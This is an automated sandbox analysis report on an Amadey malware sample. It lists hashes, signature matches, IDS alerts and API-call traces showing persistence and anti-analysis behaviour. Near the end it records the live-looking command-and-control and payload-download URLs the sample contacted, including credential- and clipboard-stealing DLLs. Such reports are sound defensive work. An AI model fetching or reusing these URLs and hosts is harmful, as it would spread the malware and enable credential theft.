Summary | ZeroBOX

lega.exe

Generic Malware UPX Downloader Admin Tool (Sysinternals etc ...) Antivirus Malicious Library Malicious Packer PE File PE64 MZP Format DLL OS Processor Check PE32 .NET EXE
Category Machine Started Completed
FILE s1_win7_x6403_us March 13, 2023, 9:40 a.m. March 13, 2023, 9:46 a.m.
Size 235.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5086db99de54fca268169a1c6cf26122
SHA256 42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4
CRC32 6598A359
ssdeep 6144:f36hrz456we4lz7zzZ5my2IuViMqJnyJQ:Pxpz7LmeuVi3nN
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

IP Address Status Action
103.114.163.134 Active Moloch
121.254.136.27 Active Moloch
164.124.101.2 Active Moloch
179.43.155.247 Active Moloch
45.130.41.59 Active Moloch
62.204.41.87 Active Moloch
62.204.41.88 Active Moloch
87.236.19.211 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 62.204.41.87:80 -> 192.168.56.103:49171 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 62.204.41.88:80 -> 192.168.56.103:49172 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49171 -> 62.204.41.87:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 62.204.41.88:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 62.204.41.88:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.88:80 -> 192.168.56.103:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 179.43.155.247:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49174 -> 179.43.155.247:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 179.43.155.247:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 179.43.155.247:80 -> 192.168.56.103:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 179.43.155.247:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 179.43.155.247:80 -> 192.168.56.103:49174 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49176 -> 62.204.41.88:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 62.204.41.88:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.88:80 -> 192.168.56.103:49176 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 62.204.41.87:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 62.204.41.87:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 62.204.41.87:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49180 -> 45.130.41.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 62.204.41.87:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.87:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.87:80 -> 192.168.56.103:49173 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 87.236.19.211:80 -> 192.168.56.103:49178 2014819 ET INFO Packed Executable Download Misc activity
TCP 87.236.19.211:80 -> 192.168.56.103:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 87.236.19.211:80 -> 192.168.56.103:49178 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 87.236.19.211:80 -> 192.168.56.103:49178 2014520 ET INFO EXE - Served Attached HTTP Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49180
45.130.41.59:443
C=US, O=Let's Encrypt, CN=R3 CN=buparts.store 94:9c:63:ef:79:4b:bb:12:cc:96:87:94:a5:a7:f3:44:30:5a:03:e1

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "legenda.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e92f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e92f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e91b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e9578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e9578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003e95b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x42e563d
0x42e2102
0x42e2013
0x42e1d69
0x42e1c4b
0x1f8c9e8
0x1f8c86b
0x1f8c7bb
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737
mscorlib+0x2d3711 @ 0x721f3711
mscorlib+0x308f2d @ 0x72228f2d
mscorlib+0x3133fd @ 0x722333fd
0x1f100dc
0x1f10062
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74117f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74114de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 8b 00 6a 00 6a 00 6a 01 50 e8 09
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x1f35453
registers.esp: 3795956
registers.edi: 36286524
registers.eax: 33109304
registers.ebp: 3795968
registers.edx: 0
registers.ebx: 3796744
registers.esi: 0
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.204.41.87/joomla/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/lend/Installer.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://179.43.155.247/cc.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/lend/blueloader.exe
suspicious_features GET method with no useragent header suspicious_request GET http://downloads.buparts.store/download.php?shortURL=DgIz04
suspicious_features GET method with no useragent header suspicious_request GET http://downloads.buparts.store/views/download.php?shortURL=DgIz04
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.87/joomla/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.87/joomla/Plugins/clip64.dll
request POST http://62.204.41.87/joomla/index.php
request GET http://62.204.41.88/lend/Installer.exe
request GET http://179.43.155.247/cc.exe
request GET http://62.204.41.88/lend/blueloader.exe
request GET http://downloads.buparts.store/download.php?shortURL=DgIz04
request GET http://downloads.buparts.store/views/download.php?shortURL=DgIz04
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://62.204.41.87/joomla/Plugins/cred64.dll
request GET http://62.204.41.87/joomla/Plugins/clip64.dll
request POST http://62.204.41.87/joomla/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2676
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 151552
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002dc000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2676
region_size: 188416
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00560000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e30000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00602000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0063b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00637000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0061c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00626000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0062a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00627000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0060a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0061d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f3f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0061e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fc1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0061f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fda000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fdb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fdc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description legenda.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000015001\download.exe
file C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
file C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
